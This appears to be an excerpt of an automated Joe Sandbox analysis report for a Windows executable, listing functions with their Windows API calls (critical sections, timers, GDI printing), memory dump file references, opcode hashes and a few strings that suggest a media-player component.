                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752716705.0000000000628000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752762497.0000000000674000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752819665.00000000006E7000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752843788.00000000006EA000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752868824.00000000006F5000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752893551.00000000006F9000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752926826.0000000000700000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752955092.0000000000703000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752983533.0000000000709000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2753008955.000000000070E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2753047868.000000000073C000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2753073042.000000000073F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_27_2_400000_1718218388.jbxd
                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                          • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                          • API String ID: 3168844106-0
                                                                                                                                                                                                                                                                                                                          • Opcode ID: 7e8666cb07b5cacadf35492099d50c0e827f2b9a1fadfb76ea06a7d0beb11ddf
                                                                                                                                                                                                                                                                                                                          • Instruction ID: 143f1fb28292c6c8f5848ec82d72cb0c1768edffe3cb57bca7300ec5568bca4f
                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7e8666cb07b5cacadf35492099d50c0e827f2b9a1fadfb76ea06a7d0beb11ddf
                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2AA1113020430E8BC725DF349854BBBBBB9AF94304F15056EFA5687382DB79E809CB65
                                                                                                                                                                                                                                                                                                                          Function 004D7EF0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 92COMMON
                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                          • StartDocA.GDI32(?,00000000), ref: 004D7F29
                                                                                                                                                                                                                                                                                                                          • GetDeviceCaps.GDI32(?,00000008), ref: 004D7F47
                                                                                                                                                                                                                                                                                                                          • GetDeviceCaps.GDI32(?,0000000A), ref: 004D7F55
                                                                                                                                                                                                                                                                                                                          • LPtoDP.GDI32(00000000,00000002), ref: 004D7F83
                                                                                                                                                                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000006E), ref: 004D7FA0
                                                                                                                                                                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000006F), ref: 004D7FAE
                                                                                                                                                                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,00000058), ref: 004D7FBC
                                                                                                                                                                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004D7FD2
                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                          • Source File: 0000001B.00000002.2751852228.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2751827430.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752586158.000000000053D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752626036.0000000000555000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752626036.0000000000562000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752716705.0000000000628000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752762497.0000000000674000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752819665.00000000006E7000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752843788.00000000006EA000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752868824.00000000006F5000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752893551.00000000006F9000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752926826.0000000000700000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752955092.0000000000703000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752983533.0000000000709000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2753008955.000000000070E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2753047868.000000000073C000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2753073042.000000000073F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_27_2_400000_1718218388.jbxd
                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                          • API ID: CapsDevice$Start
                                                                                                                                                                                                                                                                                                                          • String ID: portrait
                                                                                                                                                                                                                                                                                                                          • API String ID: 1738886688-2504013051
                                                                                                                                                                                                                                                                                                                          • Opcode ID: 87bb50d4ff0b2b6bcd955025618aa84fe9db738b10e38e5fb2dd326402729996
                                                                                                                                                                                                                                                                                                                          • Instruction ID: 78bfa520cedcb1c13f518f393ea8421dc938ea51f70754ce75912898c89e0c82
                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 87bb50d4ff0b2b6bcd955025618aa84fe9db738b10e38e5fb2dd326402729996
                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7641DFB0604B109FC324DF2AD980A1AFBF5BF98710F108A1EE58A877A1D771E845CF91
                                                                                                                                                                                                                                                                                                                          Function 004F7040 Relevance: 15.3, APIs: 10, Instructions: 296timeCOMMON
                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,00000000,?,00000000,00000000,?,004AC0BD,?,?), ref: 004F705A
                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004F7081
                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 004F709A
                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004F70A3
                                                                                                                                                                                                                                                                                                                          • timeGetTime.WINMM(00000000,00000000,00000000,00000000,?), ref: 004F7390
                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?,?), ref: 004F73D5
                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                          • Source File: 0000001B.00000002.2751852228.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2751827430.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752586158.000000000053D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752626036.0000000000555000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752626036.0000000000562000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752716705.0000000000628000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752762497.0000000000674000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752819665.00000000006E7000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752843788.00000000006EA000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752868824.00000000006F5000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752893551.00000000006F9000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752926826.0000000000700000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752955092.0000000000703000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752983533.0000000000709000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2753008955.000000000070E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2753047868.000000000073C000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2753073042.000000000073F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_27_2_400000_1718218388.jbxd
                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                          • API ID: CriticalSection$Leave$Enter$Timetime
                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                          • API String ID: 4022644143-0
                                                                                                                                                                                                                                                                                                                          • Opcode ID: 619e67b58965c9b6edfd0f45f913366b2bb88d2215bcce8f286a8ccc74bc94e1
                                                                                                                                                                                                                                                                                                                          • Instruction ID: 3d57daaa4b40982c2e4bbac1192c2a7fdd3e5fb289d79a2cbb097eeb1d58369f
                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 619e67b58965c9b6edfd0f45f913366b2bb88d2215bcce8f286a8ccc74bc94e1
                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 60A12B303083495BC7259F398890BBBBBE59F85700F04456EFA9AC7392DB6CE905D768
                                                                                                                                                                                                                                                                                                                          Function 004F2A10 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 79timeCOMMON
                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,00000000,004F7352,?), ref: 004F2A19
                                                                                                                                                                                                                                                                                                                          • timeGetTime.WINMM ref: 004F2A25
                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004F2A39
                                                                                                                                                                                                                                                                                                                          • timeGetTime.WINMM(?), ref: 004F2A46
                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004F2AD7
                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                          • Source File: 0000001B.00000002.2751852228.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2751827430.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752586158.000000000053D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752626036.0000000000555000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752626036.0000000000562000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752716705.0000000000628000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752762497.0000000000674000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752819665.00000000006E7000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752843788.00000000006EA000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752868824.00000000006F5000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752893551.00000000006F9000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752926826.0000000000700000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752955092.0000000000703000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752983533.0000000000709000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2753008955.000000000070E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2753047868.000000000073C000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2753073042.000000000073F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_27_2_400000_1718218388.jbxd
                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                          • API ID: CriticalSection$LeaveTimetime$Enter
                                                                                                                                                                                                                                                                                                                          • String ID: NetStream.Buffer.Empty$NetStream.Buffer.Full$status
                                                                                                                                                                                                                                                                                                                          • API String ID: 2943255653-4242577526
                                                                                                                                                                                                                                                                                                                          • Opcode ID: 2800b6424f4894067f550383054d91bd5e105dc9488e734664937b715ac8d418
                                                                                                                                                                                                                                                                                                                          • Instruction ID: adfbc573f46a5ae42de3eb127535f59d6c3a8125dfae6686c248f3bcdabba04f
                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2800b6424f4894067f550383054d91bd5e105dc9488e734664937b715ac8d418
                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 33217471740705ABD7308F14DD86B6BB7A4FB50B21F24462BF267966D0C7B4B8408754
                                                                                                                                                                                                                                                                                                                          Function 004F3EC0 Relevance: 13.7, APIs: 9, Instructions: 245COMMON
                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,?,004F5B64,00000002), ref: 004F3ED0
                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004F3EDE
                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004F3F20
                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                          • Source File: 0000001B.00000002.2751852228.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2751827430.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752586158.000000000053D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752626036.0000000000555000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752626036.0000000000562000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752716705.0000000000628000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752762497.0000000000674000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752819665.00000000006E7000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752843788.00000000006EA000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752868824.00000000006F5000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752893551.00000000006F9000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752926826.0000000000700000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752955092.0000000000703000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752983533.0000000000709000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2753008955.000000000070E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2753047868.000000000073C000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2753073042.000000000073F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_27_2_400000_1718218388.jbxd
                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                          • API ID: CriticalSection$Leave$Enter
                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                          • API String ID: 2978645861-0
                                                                                                                                                                                                                                                                                                                          • Opcode ID: 34f8658622f1aa9e900f4973e8c3da322a382f9696d29d907fda60f1af10eeb7
                                                                                                                                                                                                                                                                                                                          • Instruction ID: 85195bc957575009e4a7604c5a43e45099f91f30af12cfc7e5b33174ac27f883
                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 34f8658622f1aa9e900f4973e8c3da322a382f9696d29d907fda60f1af10eeb7
                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BF81C0316047494FC724DF39989057BB7F1AF853117148A2FE6A787B81DB38E805CB68
                                                                                                                                                                                                                                                                                                                          Function 00401170 Relevance: 13.6, APIs: 9, Instructions: 124timeCOMMON
                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 00401181
                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004011B1
                                                                                                                                                                                                                                                                                                                          • timeGetTime.WINMM ref: 004011C5
                                                                                                                                                                                                                                                                                                                          • timeGetTime.WINMM ref: 004011D5
                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 004011E3
                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 0040122A
                                                                                                                                                                                                                                                                                                                          • timeGetTime.WINMM ref: 0040123E
                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 00401261
                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 0040129E
                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                          • Source File: 0000001B.00000002.2751852228.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2751827430.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752586158.000000000053D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752626036.0000000000555000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752626036.0000000000562000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752716705.0000000000628000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752762497.0000000000674000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752819665.00000000006E7000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752843788.00000000006EA000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752868824.00000000006F5000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752893551.00000000006F9000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752926826.0000000000700000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752955092.0000000000703000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752983533.0000000000709000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2753008955.000000000070E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2753047868.000000000073C000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2753073042.000000000073F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_27_2_400000_1718218388.jbxd
                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                          • API ID: CriticalSection$EnterLeaveTimetime
                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                          • API String ID: 3486229058-0
                                                                                                                                                                                                                                                                                                                          • Opcode ID: 5c08956a0c7860ec974705ddb8904b2646fc942159566fcab6cb5e79d3acde08
                                                                                                                                                                                                                                                                                                                          • Instruction ID: b4a63a4f06c8fcffd2d454e61e85ed039b73bf68413dd997414ba6e559c29426
                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5c08956a0c7860ec974705ddb8904b2646fc942159566fcab6cb5e79d3acde08
                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6641D6357003148FCB309F60E80466BB7F4AF6575470486AEE896BB3E1DB38EC459AA5
                                                                                                                                                                                                                                                                                                                          Function 00411A80 Relevance: 12.6, APIs: 1, Strings: 6, Instructions: 394COMMON
                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                          • InterlockedExchange.KERNEL32(00000020,00000000), ref: 00411B68
                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                          • Source File: 0000001B.00000002.2751852228.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2751827430.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752586158.000000000053D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752626036.0000000000555000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752626036.0000000000562000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752716705.0000000000628000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752762497.0000000000674000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752819665.00000000006E7000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752843788.00000000006EA000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752868824.00000000006F5000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752893551.00000000006F9000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752926826.0000000000700000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752955092.0000000000703000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752983533.0000000000709000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2753008955.000000000070E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2753047868.000000000073C000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2753073042.000000000073F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_27_2_400000_1718218388.jbxd
                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                          • API ID: ExchangeInterlocked
                                                                                                                                                                                                                                                                                                                          • String ID: GET$_bytesLoaded$_bytesTotal$_customHeaders$contentType$loaded
                                                                                                                                                                                                                                                                                                                          • API String ID: 367298776-2876428247
                                                                                                                                                                                                                                                                                                                          • Opcode ID: bc7a406daf2fbb0983bef868be79dd6fb756b60b2efaa2edd4b44b4e4be769b1
                                                                                                                                                                                                                                                                                                                          • Instruction ID: 337a073203a489cf9af6a636d5e82807fd5ac3b12a53b57697a6972a4ae57270
                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bc7a406daf2fbb0983bef868be79dd6fb756b60b2efaa2edd4b44b4e4be769b1
                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F6D126706047056BC714EF65D842AABB7E5BF88304F404A2EFA4687392EB38F945C799
                                                                                                                                                                                                                                                                                                                          Function 004F34D0 Relevance: 11.4, APIs: 9, Instructions: 158COMMON
                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,00000000,?,?,?,?,004F5BA3,00000000), ref: 004F34EA
                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,004F5BA3,00000000), ref: 004F3537
